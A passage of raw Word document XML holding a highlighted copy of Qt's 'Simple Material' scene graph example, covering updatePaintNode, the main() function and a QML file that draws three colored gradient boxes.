        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function is called</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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B31A2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The scene graph may be rendered in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> than the GUI thread and</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2162" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() is one of the few places where it is safe to access properties of the QML object. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any interaction with the scene graph from a custom</w:t>
      </w:r>
      <w:r w:rsidR="00DF3A5D" w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2163" w:history="1">
        <w:r w:rsidRPr="00DF3A5D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DF3A5D" w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be contained within this function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function is called on the rendering thread while the GUI thread is blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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The first time this function is called for an</w:t>
      </w:r>
      <w:r w:rsidR="00DF3A5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidR="00DF3A5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instance, the node will be 0, and so we create a new one. For every consecutive call, the node will be what we returned previously. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">scenarios where the scene graph will be removed and rebuilt from </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scratch</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> however, so one should always check the node and recreate it if required</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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Once we have a</w:t>
      </w:r>
      <w:r w:rsidR="00DF3A5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ColorNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we update its geometry and material state. Finally, we notify the scene graph that the node has undergone changes to its geometry and material.</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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qmlRegisterType</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"SimpleMaterial"</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1</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0</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"SimpleMaterialItem"</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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view</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setResizeMode</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QQuickView</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SizeRootObjectToView</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view</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setSource</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QUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc:///scenegraph/simplematerial/main.qml"</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view</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show</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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"simplematerial.moc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00CD4012">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function of the application adds the custom QML type using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2164" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() and opens up a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2165" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with our QML file.</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import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QtQuick</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2.0</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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SimpleMaterial</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1.0</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rectangle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width</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320</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height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480</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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    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"black"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00CD4012">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the QML file, we import our custom type so we can instantiate it.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Column</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anchors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fill</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parent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SimpleMaterialItem</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width</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parent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width</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height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parent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height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3</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"steelblue"</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SimpleMaterialItem</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width</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parent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width</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height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parent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height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3</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"darkorchid"</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SimpleMaterialItem</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width</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parent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width</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height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parent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height </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3</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"springgreen"</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then we create a column containing three instances of our custom item, each with a different color.</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Rectangle</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Qt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rgba</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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0</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0</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0.8</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radius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10</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antialiasing</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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border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width</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1</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border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"black"</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anchors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fill</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label</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anchors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margins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r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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Text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id</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label</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color</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"white"</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wrapMode</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordWrap</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text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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"These three gradient boxes are colorized using a custom material."</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anchors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right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parent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right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anchors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left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parent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left</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anchors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bottom</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parent</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bottom</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anchors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margins</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00CD401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D4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00CD4012">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>And finally we overlay a short descriptive text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00DF3A5D" w:rsidRDefault="00DF3A5D" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
